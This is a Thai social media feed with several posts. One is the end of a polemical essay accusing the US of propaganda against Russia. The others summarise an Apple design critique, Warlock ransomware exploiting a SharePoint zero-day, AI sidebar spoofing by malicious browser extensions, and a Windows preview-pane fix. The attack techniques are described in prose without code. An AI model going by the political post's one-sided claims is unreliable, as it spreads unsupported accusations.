(รายละเอียดมีอยู่ในนิทานเรื่อง “จิกโก๋ปากซอย” ถ้าอยากอ่านประวัติศาสตร์ นอกหลักสูตร กระทรวงศึกษาฯ) เรื่องที่ 2 ที่คณะละคร บอกสำคัญอย่างยิ่ง คือ เราต้องย้อมความคิค ย้อมสมองคนรัสเซียให้ “อยากทำสงคราม” ไม่ให้เชื่อฟังเยอรมัน อเมริกาจะทำได้อย่างไร รัสเซียไม่ใช่สมันน้อยนะ คณะละครบอกไม่มีปัญหา คนรัสเซีย ก็เหมือนเด็ก ที่ตัวโตนั่นแหละ เอ้า เจ้าหน้าที่รัสเซียที่ตามอ่านนิทาน ช่วยขีดเส้นใต้ 2 เส้น แล้วรายงานส่งคุณพี่ปูตินของผมด้วยนะครับ ว่าอเมริกาพูดแบบนี้ แปลว่าเห็นคนรัสเซียเป็นยังไง (เสี้ยม ซะหน่อย) คณะละครเร่ เขียนแผนการฟอกย้อมให้เสร็จ เขาระบุว่า เป้าหมายของแผนคือ: “To influence the attitude of the people of Russia for the prosecution of war as the only way of perpetuating their democracy ” ใครแปลเก่งๆ ลองแปลดูครับ สำหรับผม ผมเข้าใจความว่า เพื่อเป็นการย้อมความคิดของคนรัสเซีย ให้เชื่อว่า การเข้าทำสงคราม เป็นทางเดียวที่จะทำให้ประชาธิปไตยของเขาอยู่อย่างยั่งยืน ผมเขียนปูพื้น เล่ามาเสียยืดยาว เพื่อจะให้อ่านประโยคนี้กัน อ่านแล้วโปรดพิเคราะห์กันให้ดีๆ จะได้เห็น “สันดาน” อันอำมหิต ของอเมริกา (และของอังกฤษ) ที่ผ่านมาแล้วเกือบ 100 ปี แล้วก็ยังไม่เปลี่ยน และอีกกี่ร้อยปี ก็คงไม่มีวันเปลี่ยนความอำมหิต นี้ โดยใช้ความตอแหล แบบหน้าด้านๆ อ้างเรื่องประชาธิปไตย แบบตะหวักตะบวย เพื่อประโยชน์ของมัน หรือพวกมันเท่านั้น ใครจะเจ็บ ใครจะตาย ใครจะฉิบหาย ใครจะวิบัติ ขนาดไหน มันไม่สนใจ เลวถึงขนาดนี้ อำมหิต อย่างนี้ ยังมีคนอยากให้อเมริกา ครอบหัวสี่เหลี่ยมต่อไปอีกหรือครับ แผนการฟอกย้อม จะใช้วิธีหลักๆ อยู่ 5 อย่าง 1. จัดกระบวนการ “สร้าง และย้อมข่าว” แล้วกระจายข่าว ที่สร้างและย้อมแล้ว ไปทั่วรัสเซีย โดยจะเอาทีมงานมาจากอเมริกา ทั้งด้านการเขียน และการแปล คือเอาช่างชำนาญการย้อมของอเมริกา มาตั้งโรงงานที่รัสเซีย เหมือนที่มีอยู่เกลื่อนในบ้านสมันน้อย ซื้อมันทุกช่อง ครอบมันทุกฉบับ 2. การใช้เอกสารประเภทแผ่นพับ และใบปลิว เพื่อง่ายแก่การเสพข่าว สมัยนี้ก็คงเปลี่ยนเป็น เครื่องมือ ไอ้ป๊อด ไอ้แป้ด ไอ้โฟน โดยเฉพาะ พวกเล่นไลน์นี่เหยื่อชั้นดี ส่งข่าวย้อมอะไรเข้าไปแพลบเดียว กระจายทั่ว เรื่องโกหกทั้งนั้น เสพกันได้แยะและเร็วกว่า 3. สร้างหนังประเภทต่างๆ เพื่อให้ชาวรัสเซียเสพ เช่น หนังเกี่ยวกับสงคราม หนังชีวิตคนอเมริกันในชนบท ในเมือง หนังเกี่ยวกับการทำอุตสาหกรรม การค้า หนังตลก และที่สำคัญ หนังที่แสดงถึงความรักชาติและการแสวงหาประชาธิปไตย ฮอลลีวู้ดรับไป เดี๋ยวนี้ก็ยังเป็นโรงย้อมที่สำคัญหมายเลขหนึ่ง 4. การโฆษณา ประชาสัมพันธ์ โดยเฉพาะทำเป็นแผ่นโปสเตอร์สีสวยสดุดตา สื่อหัวข้อที่เหมาะสมกับรัสเซีย โดยให้สำนักงานประชาสัมพันธ์ ฝีมือเยี่ยมของอเมริกา รู้ไหมครับ พวกประชาสัมพันธ์เก่งๆ เขาย้อมโลกใบนี้มานานเท่าไหร่แล้ว เขาเอาอะไรมาใส่หัวสมันน้อยบ้าง 5. วิธีการที่แนบเนียนและใช้แพร่หลาย คือการพูด ซึ่งจำเป็นต้องใช้ นักพูด นักประชาสัมพันธ์ และครู เป็นจำนวนมาก โดยอเมริกาอาจจะเลือกอย่างเหมาะสม จากชาวรัสเซียก็ได้ นักพูดและครูนี้ ถือว่าเป็นเครื่องมือย้อมที่เยี่ยมที่สุด วิธีการนี้ บ้านสมันน้อยใช้แยะมาก ยิ่งตอนนี้ซึ่งเป็นช่วงสำคัญของบ้านเมือง ช่างย้อมถูกจ้างมาทำหน้าที่เพิ่มขึ้นอีกมาก มาในสาระพัดคราบ หัดสังเกตกันบ้าง ใครของจริง ใครของปลอม ใครช่างย้อมฝีมือเนียน เป็นไงครับ 5 วิธีการหลัก ยังอยู่ครบในศตวรรษนี้ แค่เปลี่ยน เสื้อผ้า หน้าผม ถ้อยคำ ท่าทาง ให้เข้ากับสมัย ละครฉากเดิมๆก็ยังใช้ได้ เครื่องมือย้อมก็ยังใช้อยู่ แค่เปลี่ยนรุ่นใหม่ไปเรื่อยๆ เท่านั้น นี่ตกลงเราจะให้เขาเล่นแบบนี้ ไปเรื่อยๆ อีก 100 ปีหรือไงครับ สวัสดีครับ คนเล่านิทาน 26 กพ. 2558 #################### เอกสารประกอบ FRUS https://www.dropbox.com/s/
    0 ความคิดเห็น 0 การแบ่งปัน 34 มุมมอง 0 รีวิว
  • Apple กับคำถามที่ยังค้างคา: “ความใส่ใจในรายละเอียดหายไปไหน?”

    หากคุณเคยหลงรัก Apple เพราะความเรียบง่าย ความสวยงาม และความใส่ใจในรายละเอียดของผลิตภัณฑ์ คุณอาจรู้สึกเหมือนถูกหักหลังในยุคหลังๆ โดยเฉพาะเมื่อได้สัมผัสกับ iOS 26 และ macOS 26 ที่เต็มไปด้วยความไม่ลงตัว ความไม่สอดคล้อง และประสบการณ์ผู้ใช้ที่ชวนให้หงุดหงิด

    John Ozbay นักพัฒนาและนักออกแบบที่เคยหลงใหลใน Apple ได้เขียนบล็อกที่สะท้อนความผิดหวังอย่างลึกซึ้งต่อการเปลี่ยนแปลงของ Apple ในช่วง 8–10 ปีที่ผ่านมา เขายกตัวอย่างมากมายที่แสดงให้เห็นว่า Apple อาจละเลยหลักการออกแบบที่เคยเป็นหัวใจของแบรนด์ ไม่ว่าจะเป็นการจัดวาง search bar ที่ไม่สอดคล้องกันในแต่ละแอป การแจ้งเตือนที่รบกวนการทำงาน การออกแบบ UI ที่ไม่เหมาะกับ dark mode หรือแม้แต่การบังคับให้เบราว์เซอร์ third-party ใช้ WebKit ที่เต็มไปด้วยบั๊ก

    สิ่งที่น่าตกใจคือ Apple ไม่เพียงแค่ไม่แก้ไขปัญหาเก่า แต่ยังเพิ่มปัญหาใหม่ๆ เข้ามาอีก เช่น การออกแบบ “liquid glass” ที่ทำให้ข้อความใน iMessage อ่านยาก การจัดวาง UI ที่ไม่สอดคล้องกันระหว่างแอป และการทำให้ control center กลายเป็น “ดิสโก้บอล” ที่ใช้งานยาก

    ทั้งหมดนี้สะท้อนถึงคำถามสำคัญว่า Apple ยังให้ความสำคัญกับประสบการณ์ผู้ใช้อยู่หรือไม่ หรือกำลังหลงทางไปกับการออกแบบที่เน้นความฉูดฉาดมากกว่าความเรียบง่ายที่เคยเป็นจุดแข็ง

    ความเปลี่ยนแปลงในผลิตภัณฑ์ Apple
    iOS 26 และ macOS 26 มีปัญหาด้าน UI/UX มากมาย
    Search bar ถูกวางไว้ต่างกันในแต่ละแอป ทำให้ใช้งานยาก
    Reminders app รบกวนผู้ใช้ด้วย popup ขอสิทธิ์ซ้ำๆ
    Dark mode ใน Files app ทำให้บางองค์ประกอบมองไม่เห็น
    Share sheet และ Settings มีปัญหาในการแสดงผลไอคอน
    Safari และเบราว์เซอร์อื่นมีปัญหา viewport และปุ่มกระพริบ
    iMessage มีพื้นหลังที่ทำให้ข้อความอ่านยาก
    App Library แสดงไอคอนไม่ครบหรือไม่เสถียร

    ปัญหาด้านเทคโนโลยีและการบังคับใช้
    Apple บังคับให้เบราว์เซอร์ third-party ใช้ WebKit ที่มีบั๊ก
    การเปลี่ยน tab ใน Safari ต้องใช้สองขั้นตอนและมีเอฟเฟกต์รบกวน
    Liquid glass UI ไม่เหมาะกับหน้าจอขนาดเล็ก เช่น iPhone mini

    มุมมองจากนักพัฒนา
    John Ozbay และนักออกแบบหลายคนเริ่มหมดศรัทธาใน Apple
    Nielsen Norman Group ก็วิจารณ์ liquid glass ว่าเป็นการออกแบบที่ไม่เหมาะสม
    การออกแบบที่ไม่สอดคล้องกันสะท้อนถึงการขาดแนวทางร่วมของทีม

    https://blog.johnozbay.com/what-happened-to-apples-attention-to-detail.html
    🍎 Apple กับคำถามที่ยังค้างคา: “ความใส่ใจในรายละเอียดหายไปไหน?” หากคุณเคยหลงรัก Apple เพราะความเรียบง่าย ความสวยงาม และความใส่ใจในรายละเอียดของผลิตภัณฑ์ คุณอาจรู้สึกเหมือนถูกหักหลังในยุคหลังๆ โดยเฉพาะเมื่อได้สัมผัสกับ iOS 26 และ macOS 26 ที่เต็มไปด้วยความไม่ลงตัว ความไม่สอดคล้อง และประสบการณ์ผู้ใช้ที่ชวนให้หงุดหงิด John Ozbay นักพัฒนาและนักออกแบบที่เคยหลงใหลใน Apple ได้เขียนบล็อกที่สะท้อนความผิดหวังอย่างลึกซึ้งต่อการเปลี่ยนแปลงของ Apple ในช่วง 8–10 ปีที่ผ่านมา เขายกตัวอย่างมากมายที่แสดงให้เห็นว่า Apple อาจละเลยหลักการออกแบบที่เคยเป็นหัวใจของแบรนด์ ไม่ว่าจะเป็นการจัดวาง search bar ที่ไม่สอดคล้องกันในแต่ละแอป การแจ้งเตือนที่รบกวนการทำงาน การออกแบบ UI ที่ไม่เหมาะกับ dark mode หรือแม้แต่การบังคับให้เบราว์เซอร์ third-party ใช้ WebKit ที่เต็มไปด้วยบั๊ก สิ่งที่น่าตกใจคือ Apple ไม่เพียงแค่ไม่แก้ไขปัญหาเก่า แต่ยังเพิ่มปัญหาใหม่ๆ เข้ามาอีก เช่น การออกแบบ “liquid glass” ที่ทำให้ข้อความใน iMessage อ่านยาก การจัดวาง UI ที่ไม่สอดคล้องกันระหว่างแอป และการทำให้ control center กลายเป็น “ดิสโก้บอล” ที่ใช้งานยาก ทั้งหมดนี้สะท้อนถึงคำถามสำคัญว่า Apple ยังให้ความสำคัญกับประสบการณ์ผู้ใช้อยู่หรือไม่ หรือกำลังหลงทางไปกับการออกแบบที่เน้นความฉูดฉาดมากกว่าความเรียบง่ายที่เคยเป็นจุดแข็ง ✅ ความเปลี่ยนแปลงในผลิตภัณฑ์ Apple ➡️ iOS 26 และ macOS 26 มีปัญหาด้าน UI/UX มากมาย ➡️ Search bar ถูกวางไว้ต่างกันในแต่ละแอป ทำให้ใช้งานยาก ➡️ Reminders app รบกวนผู้ใช้ด้วย popup ขอสิทธิ์ซ้ำๆ ➡️ Dark mode ใน Files app ทำให้บางองค์ประกอบมองไม่เห็น ➡️ Share sheet และ Settings มีปัญหาในการแสดงผลไอคอน ➡️ Safari และเบราว์เซอร์อื่นมีปัญหา viewport และปุ่มกระพริบ ➡️ iMessage มีพื้นหลังที่ทำให้ข้อความอ่านยาก ➡️ App Library แสดงไอคอนไม่ครบหรือไม่เสถียร ✅ ปัญหาด้านเทคโนโลยีและการบังคับใช้ ➡️ Apple บังคับให้เบราว์เซอร์ third-party ใช้ WebKit ที่มีบั๊ก ➡️ การเปลี่ยน tab ใน Safari ต้องใช้สองขั้นตอนและมีเอฟเฟกต์รบกวน ➡️ Liquid glass UI ไม่เหมาะกับหน้าจอขนาดเล็ก เช่น iPhone mini ✅ มุมมองจากนักพัฒนา ➡️ John Ozbay และนักออกแบบหลายคนเริ่มหมดศรัทธาใน Apple ➡️ Nielsen Norman Group ก็วิจารณ์ liquid glass ว่าเป็นการออกแบบที่ไม่เหมาะสม ➡️ การออกแบบที่ไม่สอดคล้องกันสะท้อนถึงการขาดแนวทางร่วมของทีม https://blog.johnozbay.com/what-happened-to-apples-attention-to-detail.html
    0 ความคิดเห็น 0 การแบ่งปัน 45 มุมมอง 0 รีวิว
  • Warlock Ransomware: จู่โจมองค์กรสหรัฐฯ ผ่านช่องโหว่ SharePoint โดยกลุ่มแฮกเกอร์จีน CamoFei

    ภัยคุกคามไซเบอร์ครั้งใหม่กำลังเขย่าโลกธุรกิจสหรัฐฯ เมื่อ Warlock ransomware ปรากฏตัวในเดือนมิถุนายน 2025 และถูกใช้ในการโจมตีองค์กรต่างๆ โดยอาศัยช่องโหว่ ToolShell zero-day ใน Microsoft SharePoint (CVE-2025-53770) ซึ่งสามารถเจาะระบบได้โดยไม่ต้องยืนยันตัวตน

    สิ่งที่ทำให้ Warlock แตกต่างจาก ransomware ทั่วไปคือความเชื่อมโยงกับกลุ่มแฮกเกอร์จีนสายข่าวกรอง เช่น CamoFei (หรือ ChamelGang) และ Storm-2603 ซึ่งเคยใช้เครื่องมือจารกรรมอย่าง Cobalt Strike และเทคนิค DLL sideloading ในการแทรกซึมระบบมาก่อน

    Warlock ถูกพบว่ามีลักษณะคล้ายกับ Anylock ransomware โดยใช้ extension .x2anylock และมีโครงสร้าง payload ที่ใกล้เคียงกัน บ่งชี้ว่าอาจเป็นการรีแบรนด์หรือพัฒนาต่อยอดจาก LockBit 3.0

    หนึ่งในเทคนิคที่น่ากังวลที่สุดคือการใช้ BYOVD (Bring Your Own Vulnerable Driver) โดยแฮกเกอร์นำ driver จาก Baidu Antivirus ปี 2016 ที่มีช่องโหว่มาใช้ร่วมกับ certificate ปลอมจากนักพัฒนาชื่อ “coolschool” เพื่อปิดการทำงานของโปรแกรมป้องกันไวรัสในระบบเป้าหมาย

    การโจมตีครั้งนี้ไม่ใช่แค่การเรียกค่าไถ่ แต่ยังสะท้อนถึงการบูรณาการระหว่างกลุ่มแฮกเกอร์สายข่าวกรองกับกลุ่มอาชญากรรมไซเบอร์ ซึ่งอาจเป็นยุทธศาสตร์ใหม่ของการโจมตีระดับประเทศ

    ลักษณะของ Warlock ransomware
    ปรากฏตัวครั้งแรกในเดือนมิถุนายน 2025
    ใช้ช่องโหว่ CVE-2025-53770 ใน SharePoint
    เชื่อมโยงกับกลุ่มแฮกเกอร์จีน เช่น CamoFei และ Storm-2603

    เทคนิคการโจมตี
    ใช้ BYOVD ด้วย driver จาก Baidu Antivirus ปี 2016
    ใช้ certificate ปลอมจากนักพัฒนาชื่อ “coolschool”
    ใช้ DLL sideloading และ toolkit “Project AK47”

    ความสัมพันธ์กับ ransomware อื่น
    มีลักษณะคล้าย Anylock และ LockBit 3.0
    ใช้ extension .x2anylock ในการเข้ารหัสไฟล์
    อาจเป็นการรีแบรนด์หรือพัฒนาต่อยอดจาก ransomware เดิม

    กลุ่มเป้าหมาย
    องค์กรในสหรัฐฯ และหน่วยงานรัฐบาล
    ใช้ช่องโหว่ zero-day เพื่อเข้าถึงระบบโดยไม่ต้องยืนยันตัวตน
    มีการโจมตีแบบผสมระหว่างจารกรรมและเรียกค่าไถ่

    https://securityonline.info/warlock-ransomware-hits-us-firms-exploiting-sharepoint-zero-day-linked-to-chinas-camofei-apt/
    🧨 Warlock Ransomware: จู่โจมองค์กรสหรัฐฯ ผ่านช่องโหว่ SharePoint โดยกลุ่มแฮกเกอร์จีน CamoFei ภัยคุกคามไซเบอร์ครั้งใหม่กำลังเขย่าโลกธุรกิจสหรัฐฯ เมื่อ Warlock ransomware ปรากฏตัวในเดือนมิถุนายน 2025 และถูกใช้ในการโจมตีองค์กรต่างๆ โดยอาศัยช่องโหว่ ToolShell zero-day ใน Microsoft SharePoint (CVE-2025-53770) ซึ่งสามารถเจาะระบบได้โดยไม่ต้องยืนยันตัวตน สิ่งที่ทำให้ Warlock แตกต่างจาก ransomware ทั่วไปคือความเชื่อมโยงกับกลุ่มแฮกเกอร์จีนสายข่าวกรอง เช่น CamoFei (หรือ ChamelGang) และ Storm-2603 ซึ่งเคยใช้เครื่องมือจารกรรมอย่าง Cobalt Strike และเทคนิค DLL sideloading ในการแทรกซึมระบบมาก่อน Warlock ถูกพบว่ามีลักษณะคล้ายกับ Anylock ransomware โดยใช้ extension .x2anylock และมีโครงสร้าง payload ที่ใกล้เคียงกัน บ่งชี้ว่าอาจเป็นการรีแบรนด์หรือพัฒนาต่อยอดจาก LockBit 3.0 หนึ่งในเทคนิคที่น่ากังวลที่สุดคือการใช้ BYOVD (Bring Your Own Vulnerable Driver) โดยแฮกเกอร์นำ driver จาก Baidu Antivirus ปี 2016 ที่มีช่องโหว่มาใช้ร่วมกับ certificate ปลอมจากนักพัฒนาชื่อ “coolschool” เพื่อปิดการทำงานของโปรแกรมป้องกันไวรัสในระบบเป้าหมาย การโจมตีครั้งนี้ไม่ใช่แค่การเรียกค่าไถ่ แต่ยังสะท้อนถึงการบูรณาการระหว่างกลุ่มแฮกเกอร์สายข่าวกรองกับกลุ่มอาชญากรรมไซเบอร์ ซึ่งอาจเป็นยุทธศาสตร์ใหม่ของการโจมตีระดับประเทศ ✅ ลักษณะของ Warlock ransomware ➡️ ปรากฏตัวครั้งแรกในเดือนมิถุนายน 2025 ➡️ ใช้ช่องโหว่ CVE-2025-53770 ใน SharePoint ➡️ เชื่อมโยงกับกลุ่มแฮกเกอร์จีน เช่น CamoFei และ Storm-2603 ✅ เทคนิคการโจมตี ➡️ ใช้ BYOVD ด้วย driver จาก Baidu Antivirus ปี 2016 ➡️ ใช้ certificate ปลอมจากนักพัฒนาชื่อ “coolschool” ➡️ ใช้ DLL sideloading และ toolkit “Project AK47” ✅ ความสัมพันธ์กับ ransomware อื่น ➡️ มีลักษณะคล้าย Anylock และ LockBit 3.0 ➡️ ใช้ extension .x2anylock ในการเข้ารหัสไฟล์ ➡️ อาจเป็นการรีแบรนด์หรือพัฒนาต่อยอดจาก ransomware เดิม ✅ กลุ่มเป้าหมาย ➡️ องค์กรในสหรัฐฯ และหน่วยงานรัฐบาล ➡️ ใช้ช่องโหว่ zero-day เพื่อเข้าถึงระบบโดยไม่ต้องยืนยันตัวตน ➡️ มีการโจมตีแบบผสมระหว่างจารกรรมและเรียกค่าไถ่ https://securityonline.info/warlock-ransomware-hits-us-firms-exploiting-sharepoint-zero-day-linked-to-chinas-camofei-apt/
    SECURITYONLINE.INFO
    Warlock Ransomware Hits US Firms Exploiting SharePoint Zero-Day, Linked to China’s CamoFei APT
    Symantec exposed Warlock ransomware (a probable Anylock rebrand) used by China-linked Storm-2603. It exploits the SharePoint zero-day and BYOVD to disable security and encrypt files with the .x2anylock extension.
    0 ความคิดเห็น 0 การแบ่งปัน 38 มุมมอง 0 รีวิว
  • AI Sidebar Spoofing: SquareX เตือนภัยส่วนขยายปลอมที่แอบอ้างเป็น Sidebar ของ AI Browser

    SquareX บริษัทด้านความปลอดภัยเบราว์เซอร์ ได้เปิดเผยการโจมตีรูปแบบใหม่ที่เรียกว่า “AI Sidebar Spoofing” ซึ่งใช้ส่วนขยายเบราว์เซอร์ที่เป็นอันตรายในการปลอมแปลงหน้าต่าง Sidebar ของ AI browser เช่น Comet, Brave, Edge และ Firefox เพื่อหลอกผู้ใช้ให้ทำตามคำสั่งที่เป็นอันตรายโดยเข้าใจผิดว่าเป็นคำแนะนำจาก AI จริง

    การโจมตีนี้อาศัยความไว้วางใจของผู้ใช้ที่มีต่อ AI browser ซึ่งมักใช้ Sidebar เป็นช่องทางหลักในการโต้ตอบกับ AI โดยผู้โจมตีจะสร้างส่วนขยายที่สามารถแสดง Sidebar ปลอมได้อย่างแนบเนียน เมื่อผู้ใช้พิมพ์คำถามหรือขอคำแนะนำ Sidebar ปลอมจะตอบกลับด้วยคำแนะนำที่แฝงคำสั่งอันตราย เช่น ลิงก์ฟิชชิ่ง, คำสั่ง reverse shell หรือ OAuth phishing

    SquareX ยกตัวอย่างกรณีศึกษาหลายกรณี เช่น การหลอกให้ผู้ใช้เข้าสู่เว็บไซต์ Binance ปลอมเพื่อขโมยคริปโต, การแนะนำเว็บไซต์แชร์ไฟล์ที่เป็น OAuth trap เพื่อเข้าถึง Gmail และ Google Drive, หรือการแนะนำคำสั่งติดตั้ง Homebrew ที่แฝง reverse shell เพื่อยึดเครื่องของเหยื่อ

    ที่น่ากังวลคือ ส่วนขยายเหล่านี้ใช้สิทธิ์พื้นฐานที่พบได้ทั่วไปในส่วนขยายยอดนิยม เช่น Grammarly หรือ password manager ทำให้ยากต่อการตรวจจับ และสามารถทำงานได้บนเบราว์เซอร์ทุกชนิดที่มี Sidebar AI โดยไม่จำกัดเฉพาะ AI browser

    ลักษณะของการโจมตี AI Sidebar Spoofing
    ใช้ส่วนขยายเบราว์เซอร์ปลอมแปลง Sidebar ของ AI browser
    หลอกผู้ใช้ให้ทำตามคำสั่งที่เป็นอันตรายโดยเข้าใจผิดว่าเป็นคำแนะนำจาก AI
    สามารถทำงานได้บนเบราว์เซอร์ทั่วไปที่มี Sidebar AI เช่น Edge, Brave, Firefox

    ตัวอย่างการโจมตี
    ลิงก์ฟิชชิ่งปลอมเป็น Binance เพื่อขโมยคริปโต
    OAuth phishing ผ่านเว็บไซต์แชร์ไฟล์ปลอม
    reverse shell แฝงในคำสั่งติดตั้ง Homebrew

    จุดอ่อนของระบบ
    ส่วนขยายใช้สิทธิ์พื้นฐานที่พบได้ทั่วไป ทำให้ยากต่อการตรวจจับ
    ไม่มีความแตกต่างด้านภาพหรือการทำงานระหว่าง Sidebar จริงกับ Sidebar ปลอม
    ส่วนขยายสามารถแฝงตัวและรอจังหวะที่เหมาะสมในการโจมตี

    การป้องกันจาก SquareX
    เสนอเครื่องมือ Browser Detection and Response (BDR)
    มีระบบตรวจจับและวิเคราะห์พฤติกรรมส่วนขยายแบบ runtime
    เสนอการตรวจสอบส่วนขยายทั้งองค์กรฟรี

    คำเตือนสำหรับผู้ใช้งานเบราว์เซอร์ที่มี AI Sidebar
    อย่าติดตั้งส่วนขยายจากแหล่งที่ไม่เชื่อถือ
    อย่าทำตามคำแนะนำจาก Sidebar โดยไม่ตรวจสอบความถูกต้อง
    ระวังคำสั่งที่เกี่ยวข้องกับการเข้าสู่ระบบ, การติดตั้งโปรแกรม หรือการแชร์ข้อมูล

    คำแนะนำเพิ่มเติม
    ใช้เบราว์เซอร์ที่มีระบบตรวจสอบส่วนขยายแบบละเอียด
    ตรวจสอบสิทธิ์ของส่วนขยายก่อนติดตั้ง
    อัปเดตเบราว์เซอร์และส่วนขยายให้เป็นเวอร์ชันล่าสุดเสมอ

    https://securityonline.info/ai-sidebar-spoofing-attack-squarex-uncovers-malicious-extensions-that-impersonate-ai-browser-sidebars/
    🕵️‍♂️ AI Sidebar Spoofing: SquareX เตือนภัยส่วนขยายปลอมที่แอบอ้างเป็น Sidebar ของ AI Browser SquareX บริษัทด้านความปลอดภัยเบราว์เซอร์ ได้เปิดเผยการโจมตีรูปแบบใหม่ที่เรียกว่า “AI Sidebar Spoofing” ซึ่งใช้ส่วนขยายเบราว์เซอร์ที่เป็นอันตรายในการปลอมแปลงหน้าต่าง Sidebar ของ AI browser เช่น Comet, Brave, Edge และ Firefox เพื่อหลอกผู้ใช้ให้ทำตามคำสั่งที่เป็นอันตรายโดยเข้าใจผิดว่าเป็นคำแนะนำจาก AI จริง การโจมตีนี้อาศัยความไว้วางใจของผู้ใช้ที่มีต่อ AI browser ซึ่งมักใช้ Sidebar เป็นช่องทางหลักในการโต้ตอบกับ AI โดยผู้โจมตีจะสร้างส่วนขยายที่สามารถแสดง Sidebar ปลอมได้อย่างแนบเนียน เมื่อผู้ใช้พิมพ์คำถามหรือขอคำแนะนำ Sidebar ปลอมจะตอบกลับด้วยคำแนะนำที่แฝงคำสั่งอันตราย เช่น ลิงก์ฟิชชิ่ง, คำสั่ง reverse shell หรือ OAuth phishing SquareX ยกตัวอย่างกรณีศึกษาหลายกรณี เช่น การหลอกให้ผู้ใช้เข้าสู่เว็บไซต์ Binance ปลอมเพื่อขโมยคริปโต, การแนะนำเว็บไซต์แชร์ไฟล์ที่เป็น OAuth trap เพื่อเข้าถึง Gmail และ Google Drive, หรือการแนะนำคำสั่งติดตั้ง Homebrew ที่แฝง reverse shell เพื่อยึดเครื่องของเหยื่อ ที่น่ากังวลคือ ส่วนขยายเหล่านี้ใช้สิทธิ์พื้นฐานที่พบได้ทั่วไปในส่วนขยายยอดนิยม เช่น Grammarly หรือ password manager ทำให้ยากต่อการตรวจจับ และสามารถทำงานได้บนเบราว์เซอร์ทุกชนิดที่มี Sidebar AI โดยไม่จำกัดเฉพาะ AI browser ✅ ลักษณะของการโจมตี AI Sidebar Spoofing ➡️ ใช้ส่วนขยายเบราว์เซอร์ปลอมแปลง Sidebar ของ AI browser ➡️ หลอกผู้ใช้ให้ทำตามคำสั่งที่เป็นอันตรายโดยเข้าใจผิดว่าเป็นคำแนะนำจาก AI ➡️ สามารถทำงานได้บนเบราว์เซอร์ทั่วไปที่มี Sidebar AI เช่น Edge, Brave, Firefox ✅ ตัวอย่างการโจมตี ➡️ ลิงก์ฟิชชิ่งปลอมเป็น Binance เพื่อขโมยคริปโต ➡️ OAuth phishing ผ่านเว็บไซต์แชร์ไฟล์ปลอม ➡️ reverse shell แฝงในคำสั่งติดตั้ง Homebrew ✅ จุดอ่อนของระบบ ➡️ ส่วนขยายใช้สิทธิ์พื้นฐานที่พบได้ทั่วไป ทำให้ยากต่อการตรวจจับ ➡️ ไม่มีความแตกต่างด้านภาพหรือการทำงานระหว่าง Sidebar จริงกับ Sidebar ปลอม ➡️ ส่วนขยายสามารถแฝงตัวและรอจังหวะที่เหมาะสมในการโจมตี ✅ การป้องกันจาก SquareX ➡️ เสนอเครื่องมือ Browser Detection and Response (BDR) ➡️ มีระบบตรวจจับและวิเคราะห์พฤติกรรมส่วนขยายแบบ runtime ➡️ เสนอการตรวจสอบส่วนขยายทั้งองค์กรฟรี ‼️ คำเตือนสำหรับผู้ใช้งานเบราว์เซอร์ที่มี AI Sidebar ⛔ อย่าติดตั้งส่วนขยายจากแหล่งที่ไม่เชื่อถือ ⛔ อย่าทำตามคำแนะนำจาก Sidebar โดยไม่ตรวจสอบความถูกต้อง ⛔ ระวังคำสั่งที่เกี่ยวข้องกับการเข้าสู่ระบบ, การติดตั้งโปรแกรม หรือการแชร์ข้อมูล ‼️ คำแนะนำเพิ่มเติม ⛔ ใช้เบราว์เซอร์ที่มีระบบตรวจสอบส่วนขยายแบบละเอียด ⛔ ตรวจสอบสิทธิ์ของส่วนขยายก่อนติดตั้ง ⛔ อัปเดตเบราว์เซอร์และส่วนขยายให้เป็นเวอร์ชันล่าสุดเสมอ https://securityonline.info/ai-sidebar-spoofing-attack-squarex-uncovers-malicious-extensions-that-impersonate-ai-browser-sidebars/
    0 ความคิดเห็น 0 การแบ่งปัน 31 มุมมอง 0 รีวิว
  • Windows 11 ปรับระบบความปลอดภัย: ปิดการแสดงตัวอย่างไฟล์ที่ดาวน์โหลดจากเว็บ

    Microsoft ได้ออกอัปเดตใหม่สำหรับ Windows 11 ที่มุ่งเน้นการเพิ่มความปลอดภัยของผู้ใช้งาน โดยเฉพาะในส่วนของ File Explorer ซึ่งตอนนี้จะไม่แสดงตัวอย่างไฟล์ที่ดาวน์โหลดจากอินเทอร์เน็ตโดยอัตโนมัติอีกต่อไป การเปลี่ยนแปลงนี้เกิดขึ้นจากการค้นพบช่องโหว่ที่อาจเปิดทางให้แฮกเกอร์ขโมยข้อมูลสำคัญ เช่น NTLM authentication hashes ผ่านการ preview ไฟล์ HTML ที่มีการอ้างอิงไปยัง path ภายนอก

    เมื่อผู้ใช้พยายามเปิด preview ไฟล์ที่มี “web mark” หรือถูกระบุว่ามาจากอินเทอร์เน็ต ระบบจะแสดงคำเตือนว่า “ไฟล์นี้อาจเป็นอันตรายต่อคอมพิวเตอร์ของคุณ” และแนะนำให้เปิดไฟล์ด้วยความระมัดระวัง หากผู้ใช้มั่นใจว่าไฟล์ปลอดภัย ก็สามารถคลิกขวา เลือก Properties แล้วกด “Unblock” เพื่อเปิด preview ได้ตามปกติ

    การปรับปรุงนี้ครอบคลุม Windows 11, Windows 10 (รวมเวอร์ชัน ESU), Windows Server 2012/2012 R2/2016/2019/2025 และ Windows Server version 23H2

    การเปลี่ยนแปลงใน File Explorer
    ปิดการแสดง preview สำหรับไฟล์ที่ดาวน์โหลดจากเว็บ
    แสดงคำเตือนเมื่อพยายาม preview ไฟล์ที่มี “web mark”
    ผู้ใช้สามารถ “Unblock” ไฟล์เพื่อเปิด preview ได้

    เหตุผลด้านความปลอดภัย
    ป้องกันการรั่วไหลของ NTLM authentication hashes
    ช่องโหว่เกิดจากการ preview ไฟล์ HTML ที่อ้างอิง path ภายนอก
    ลดความเสี่ยงจากการเปิดไฟล์อันตรายโดยไม่ตั้งใจ

    ระบบที่ได้รับผลกระทบ
    Windows 11 และ Windows 10 ทุกเวอร์ชัน
    Windows Server 2012 ถึง 2025 รวมถึงเวอร์ชัน 23H2

    คำเตือนสำหรับผู้ใช้งาน
    อย่าเปิด preview ไฟล์จากอินเทอร์เน็ตโดยไม่ตรวจสอบแหล่งที่มา
    ไฟล์ HTML ที่มีการอ้างอิงภายนอกอาจเป็นช่องทางโจมตี
    การเปิด preview โดยไม่ “Unblock” อาจทำให้ระบบแสดงคำเตือนหรือปิดการทำงานบางส่วน

    คำแนะนำเพิ่มเติม
    ตรวจสอบแหล่งที่มาของไฟล์ก่อนเปิดใช้งาน
    ใช้ฟีเจอร์ “Unblock” เฉพาะเมื่อมั่นใจว่าไฟล์ปลอดภัย
